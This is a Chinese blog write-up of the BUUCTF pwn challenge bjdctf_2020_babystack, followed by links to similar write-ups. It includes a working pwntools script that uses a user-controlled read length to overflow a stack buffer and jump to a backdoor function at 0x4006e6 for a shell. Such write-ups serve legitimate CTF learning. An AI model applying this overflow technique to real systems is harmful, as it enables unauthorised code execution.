bjdctf_2020_babystack题解

最新推荐文章于 2023-10-22 18:11:21 发布
最新推荐文章于 2023-10-22 18:11:21 发布
阅读量336 收藏 3
点赞数
分类专栏: Pwn 文章标签: 安全 经验分享 linux 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/OrientalGlass/article/details/128603559
版权

1.checksec查看程序

2.ida64打开

先输入一个整形数据用于确定buf串需要读入多少个字节,这里后续使用的是0x111

 

并且这题已经给出了后门函数backdoor

 

3.查看nbytes和buf的栈空间 

nbytes在buf下方,并且nbytes是qword类型,占8个字节

 

 4.脚本

这题思路并不复杂

首先输入一个足以覆盖掉返回地址的数字

再发送覆盖数据覆盖掉返回地址执行backdoor函数即可

推荐文章:

1.Pwn基础知识笔记 对recvuntil等函数有解释

2.pwn中str()与p64 解释了为什么第一次send要使用字符串类型而不能直接发送int类型

send是模拟交互的情况,如果使用send(0x111)会有报错,并且发送的字符串要带上换行符,否则会无法结束输入

from pwn import * 
context.log_level='debug' 
p=remote("node4.buuoj.cn",26787)
p.recvuntil("[+]Please input the length of your name:")#等接收到这个字符串再发送数据
p.send(str(0x111)+'\n')    
#以字符串形式发送,服务器会收到b'273\n',这个\n也是必须的,否则会出现一直等待数据输入的情况
payload=b'a'*12+p64(0x111)+b'b'*4+p64(0x4006e6)
p.recvuntil("[+]What's u name?")#覆盖a同时保留nbytes的数值,修改返回地址执行/bin/sh
p.send(payload)		
p.interactive()

5.获取flag

 不过这里还有一个异或就是本机运行该程序不能成功获取执行权,非常奇怪

 

OrientalGlass
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
bjdctf_2020_babystack【BUUCTF】
qq_41696518的博客
08-26 551
bjdctf_2020_babystack
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 644
[buuctf]bjdctf_2020_babystack
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
bjdctf_2020_babystack
zip471642048的博客
06-22 696
checksec 一下 64位程序 没开啥东西 ,ida看一下程序 咋一看read函数读入0个字符串,读了个寂寞,scanf也不能溢出,好像没有问题 但是scanf会读入一个用户输入的数赋值给nbytes ,然后read会读取nbytes大小的字符,也就是说我们可以任意溢出长度 运行这个函数直接拿到shell exp ret 是为了平衡栈 其实往backdoor函数后递+1也行...
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 184
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
【PWN · ret2text】[BJDCTF 2020]babystack
Mr_Fmnwon的博客
04-20 743
作为pwn新手,尽可能在刷题中,记录、学习一些通用的知识点,因此wp是少不了的。本题是一道简单的ret2text。
树链剖分_题解_
10-03
树链剖分,luoguP3384 【模板】重链剖分
acm.rar_浙江大学 ACM 题解
09-24
这是网上看到的ACM题解,浙江大学网站上的东西,大家可以看看 学习下
leetcode题解_leetcode_leetcode题解_
09-29
leetcode题解 算法和数据结构题目及解答
历年题_CCF题解_
10-04
CCF题目解答
中科大_研究生_算法设计与分析_2020最新期末复习资料
06-14
中科大_研究生_算法设计与分析_2020最新期末复习资料 算法设计与分析2020.pdf 算法设计与分析2015.pdf 算法设计与分析2013.pdf ...算法大题题解.pdf 算法历年大题汇总.pdf 算法整理.pdf 分布式算法总结.pdf
【CTF】BUUCTF-bjdctf_2020_babystack1
weixin_53394081的博客
03-06 361
PWN
[BJDCTF 2020]babystack2.0
最新发布
llovewuzhengzi的博客
10-22 148
不存在file.plt[“backdoor”] plt是外部函数才有的 只能用file.symbol[“backdoor”]HIDWORD作用是取得某个8字节变量(即32位的值)在内存中处于高位的四个字节,即两个word长的数据。LODWORD作用是取得某个8字节变量(即32位的值)在内存中处于低位的四个字节,即两个word长的数据。用file.plt[“system”]不行,因为直接这样覆盖返回地址没有参数。IDA的栈不完全对,保存的ebp都没有显示,所以IDA只能参考。
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1246
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
[BUUCTF]PWN18——bjdctf_2020_babystack
mcmuyanga的博客
09-02 2625
[BUUCTF]PWN18——bjdctf_2020_babystack 附件 步骤: 例行检查,64位,开启了nx保护 试运行一下程序 大概了解程序的执行过程后用64位ida打开,shift+f12先查看一下程序里的字符串 看到/bin/sh双击跟进,ctrl+x找到了后门函数,shell_addr=0x4006e6 根据试运行的回显,找到了输入点 一个简单的小程序,buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出 EXP from pwn import* r=re
BUUCTF刷题之路--bjdctf_2020_babystack21
qq_30528603的博客
06-26 83
如果这个数小于10就能执行read,但是read的第三个参数就会变成我们的传入的数。然后我们再仔细看,nbytes这个变量从int类型转换成了unsigned int类型。意思就是说这里人为的创造了一个整数溢出。那么我们只要输入一个负数就能逃避if的检查。但是在调试的时候,我输入负数在read函数那里会直接跳过输入。于是我迫不及待的在靶机上测试,在主函数中只有我们输入的数字不超过10就能得到执行read函数的机会。今天一摸题两眼一麻黑,忘的都差不多了。我输入了一个3,接着我们继续调试到read函数中。
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1332
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
bugkuctfweb题解simple_ssti_1
06-28
simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OrientalGlass

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值